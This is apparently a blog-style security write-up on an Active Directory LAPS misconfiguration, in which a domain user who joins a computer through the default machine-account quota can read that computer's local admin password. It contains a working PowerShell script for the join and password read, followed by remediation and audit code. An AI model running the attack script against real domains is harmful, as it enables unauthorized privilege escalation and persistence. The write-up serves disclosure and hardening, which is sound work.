If the ms-DS-MachineAccountQuota attribute still has its default value (10) and the right to join computers to the domain has not been delegated to a specific group, any domain user can add computer accounts to Active Directory simply by consuming that quota. Once LAPS is installed on the host the user added, the same user can read the local administrator password (the ms-Mcs-AdmPwd attribute) of that computer and use it for persistence. When LAPS is set up, only selected principals are granted permission to read the password; however, the user who joined the computer becomes the creator and owner of the computer object and thereby holds All Extended Rights over it, which is enough to read the confidential ms-Mcs-AdmPwd attribute. This lets the user bypass GPO restrictions by recovering the local admin password even after losing local Administrator privileges on the machine: for example, after a Restricted Groups GPO has removed every account not defined in the policy from the local Administrators group, the user can log on as the local administrator, edit registry settings or add their own account back to the local Administrators group.
- Start from a Windows virtual machine that is not joined to the domain.
- Download LAPS.x64.msi and install it together with the PowerShell module extension (AdmPwd.PS).
- Import the module:
  Import-Module AdmPwd.PS
- Add the computer to Active Directory with plain domain user credentials:
  Add-ComputerToDomainWithUserRights
- Read the local admin password and determine the password policy:
  - If you are still a member of the local Administrators group after the GPO update, read the ms-Mcs-AdmPwd attribute via PowerView.ps1:
    Get-LapsLocalAdminPassword -disableDefender
  - If you are no longer a member of the local Administrators group after the GPO update, read the ms-Mcs-AdmPwd attribute via AdmPwd.PS:
    Get-LapsAdmPwd -LapsInstalled
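The procedure above, written out as an added PowerShell example (this is not the author's script, and the helper names in the steps above are not used here). All names are hypothetical: domain corp.local, user CORP\lowpriv, and a target OU named PC. Phase 1 runs on the not-yet-joined VM; phase 2 runs after the reboot, logged on as the same domain user, once the LAPS GPO has applied and the LAPS client has written ms-Mcs-AdmPwd. The direct LDAP read uses the built-in [adsisearcher] so no RSAT is needed on the client; the second read uses the AdmPwd.PS module installed in the steps above.

```powershell
# Added example (not from the original post). Hypothetical: corp.local, CORP\lowpriv, OU=PC.
$domain = 'corp.local'
$cred   = Get-Credential -UserName 'CORP\lowpriv' -Message 'Plain domain user, no delegated join rights'

# --- Phase 1: from the non-domain-joined VM -------------------------------------
# Read ms-DS-MachineAccountQuota on the domain naming context over LDAP with explicit
# credentials. The default is 10; 0 means ordinary users cannot create computer accounts.
$plain     = $cred.GetNetworkCredential().Password
$rootDse   = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$domain/RootDSE", $cred.UserName, $plain)
$ncDn      = $rootDse.Properties['defaultNamingContext'][0]
$domainObj = New-Object System.DirectoryServices.DirectoryEntry("LDAP://$domain/$ncDn", $cred.UserName, $plain)
$quota     = [int]$domainObj.Properties['ms-DS-MachineAccountQuota'][0]
Write-Host "ms-DS-MachineAccountQuota = $quota"
if ($quota -eq 0) { throw 'Quota is 0: a plain user cannot join a computer, so this scenario does not apply.' }

# Join with nothing more than the domain user's credentials. One unit of the quota is
# consumed, the new computer object gets mS-DS-CreatorSID = lowpriv's SID, and lowpriv
# becomes its owner, which is the basis of the extended rights the text describes.
Add-Computer -DomainName $domain -Credential $cred -Restart

# --- Phase 2: after reboot, logged on as CORP\lowpriv on the joined machine -------
# (a) Read the LAPS attributes directly over LDAP as the current (low-privileged) user.
#     ms-Mcs-AdmPwd is a confidential attribute: the read only succeeds because lowpriv
#     holds control-access (extended) rights on the object it created.
$searcher = [adsisearcher]"(&(objectCategory=computer)(sAMAccountName=$env:COMPUTERNAME`$))"
[void]$searcher.PropertiesToLoad.AddRange([string[]]@('ms-Mcs-AdmPwd', 'ms-Mcs-AdmPwdExpirationTime', 'mS-DS-CreatorSID'))
$r = $searcher.FindOne()
if (-not $r) { throw "Computer object for $env:COMPUTERNAME not found" }
if (-not $r.Properties.Contains('ms-mcs-admpwd')) {
    # Either the LAPS client has not rotated the password yet, or this user has no read right.
    throw 'ms-Mcs-AdmPwd was not returned: not set yet, or no extended rights on this object'
}

$adminPwd = [string]$r.Properties['ms-mcs-admpwd'][0]
$expires  = [datetime]::FromFileTimeUtc([int64]$r.Properties['ms-mcs-admpwdexpirationtime'][0])
$creator  = New-Object System.Security.Principal.SecurityIdentifier(([byte[]]$r.Properties['ms-ds-creatorsid'][0]), 0)

Write-Host "Local admin password : $adminPwd"
Write-Host "Expires (UTC)        : $expires"
Write-Host "Created via quota by : $($creator.Translate([System.Security.Principal.NTAccount]).Value)"

# (b) The same read through the AdmPwd.PS module installed in the steps above.
Import-Module AdmPwd.PS
Get-AdmPwdPassword -ComputerName $env:COMPUTERNAME | Format-List ComputerName, Password, ExpirationTimestamp

# (c) Infer the LAPS password policy (length and complexity set by the GPO) from the value read.
$classes = @(
    @{ Name = 'upper'; Re = '[A-Z]' }, @{ Name = 'lower';   Re = '[a-z]' },
    @{ Name = 'digit'; Re = '[0-9]' }, @{ Name = 'special'; Re = '[^A-Za-z0-9]' }
) | Where-Object { $adminPwd -match $_.Re } | ForEach-Object { $_.Name }
Write-Host ("Policy observed: length {0}, character classes {1}" -f $adminPwd.Length, ($classes -join ','))
```

The check in phase 2 matters for the scenario in the text: if ms-Mcs-AdmPwd is missing from the result, the attribute is either not yet populated (the LAPS client has not run since the GPO applied) or the reader lacks control-access rights on that object, and the two cases are worth distinguishing before concluding the configuration is safe.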
A domain user can escalate privileges on a computer that the user added themselves even after a LAPS GPO is applied to that computer (as documented in this blog):
a. The machine account password change is initiated by the computer every 30 days by default.
b. A Restricted Groups GPO can remove the user from the local Administrators group.
Even after both of these have happened, the user can still escalate to local admin by reading ms-Mcs-AdmPwd.

The test setup:
- The LAPS GPO is applied to the PC organizational unit, and the lapsAdmin group is delegated for LAPS management (password read permission).
- The user has the right to add computers to the PC organizational unit (through the quota) and is not a member of the lapsAdmin group.
- The user can read the ms-Mcs-AdmPwd attribute of the computer that the user added.
Microsoft's LAPS installation documentation has been updated, so configure LAPS according to the LAPS_OperationsGuide.docx and LAPS_TechnicalSpecification documents: https://www.microsoft.com/en-us/download/confirmation.aspx?id=46899 If LAPS (Local Administrator Password Solution) is used, set ms-DS-MachineAccountQuota to 0, or delegate the right to add computers to the domain to a dedicated group. Otherwise a user can add a computer to the domain, read the local admin password and infer the password complexity policy through this LAPS misconfiguration.
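The remediation above, plus the audit a practitioner needs alongside it, as an added PowerShell example (not taken from the Microsoft LAPS guides or the original post). Setting the quota to 0 only prevents new user-initiated joins; computers users have already joined keep their creator as owner, so those objects have to be found and cleaned up too. The example assumes the ActiveDirectory (RSAT) and AdmPwd.PS modules, is run as a domain administrator, and uses hypothetical names: domain corp.local, OU=PC, and the groups CORP\DomainJoiners and CORP\lapsAdmin.

```powershell
# Added example (not from the original post or the Microsoft guides).
# Hypothetical: corp.local, OU=PC, CORP\DomainJoiners, CORP\lapsAdmin.
Import-Module ActiveDirectory
Import-Module AdmPwd.PS

$domain = 'corp.local'
$pcOu   = 'OU=PC,DC=corp,DC=local'

# 1. Close the door: no quota-based joins by ordinary users.
Set-ADDomain -Identity $domain -Replace @{ 'ms-DS-MachineAccountQuota' = '0' }

# 2. Delegate joins explicitly instead: only CORP\DomainJoiners may create computer
#    objects in the PC OU (CC = create child of class computer, inherited to sub-OUs).
dsacls $pcOu /I:T /G 'CORP\DomainJoiners:CC;computer'

# 3. Apply the delegation LAPS expects and verify who actually holds extended rights:
#    computers write their own password, only lapsAdmin reads it.
Set-AdmPwdComputerSelfPermission -OrgUnit $pcOu
Set-AdmPwdReadPasswordPermission -OrgUnit $pcOu -AllowedPrincipals 'CORP\lapsAdmin'
Find-AdmPwdExtendedRights -Identity $pcOu | Format-List ObjectDN, ExtendedRightHolders

# 4. Find computers that were created through the quota. mS-DS-CreatorSID is only
#    populated on objects created that way, so it pinpoints the exposed objects and
#    their creators, who still own them regardless of the quota value.
$exposed = Get-ADComputer -SearchBase $pcOu -Filter 'mS-DS-CreatorSID -like "*"' `
               -Properties mS-DS-CreatorSID, nTSecurityDescriptor |
    ForEach-Object {
        $sid = New-Object System.Security.Principal.SecurityIdentifier($_.'mS-DS-CreatorSID', 0)
        try   { $creator = $sid.Translate([System.Security.Principal.NTAccount]).Value }
        catch { $creator = $sid.Value }   # the creator account may have been deleted
        [pscustomobject]@{
            Computer = $_.Name
            DN       = $_.DistinguishedName
            Creator  = $creator
            Owner    = $_.nTSecurityDescriptor.Owner
        }
    }
$exposed | Format-Table -AutoSize

# 5. For each exposed computer: strip the creator's ACEs, take ownership away from the
#    creator (an owner can always re-grant itself rights via WRITE_DAC), keep Domain
#    Admins in full control, and expire the LAPS password the creator may already hold.
foreach ($c in $exposed) {
    if ($c.Creator -notmatch '^S-1-') {
        dsacls $c.DN /R $c.Creator              # remove every ACE held by the creator
    }
    dsacls $c.DN /G 'CORP\Domain Admins:GA'     # GA = generic all (full control)
    dsacls $c.DN /takeownership                 # ownership moves to the caller (a Domain Admin)
    # Set the expiration to now; the LAPS client rotates the password on its next cycle.
    Reset-AdmPwdPassword -ComputerName $c.Computer -WhenEffective (Get-Date)
}
```

Step 3 is the check worth re-running after any OU or delegation change: Find-AdmPwdExtendedRights lists every principal with extended rights on the computers under the OU, so a creator-owner that should not be there shows up next to lapsAdmin. The orphan-SID guard in step 5 exists because dsacls /R expects an account name; a SID whose account was deleted still has to be cleared, which the /takeownership and Reset-AdmPwdPassword steps cover in practice.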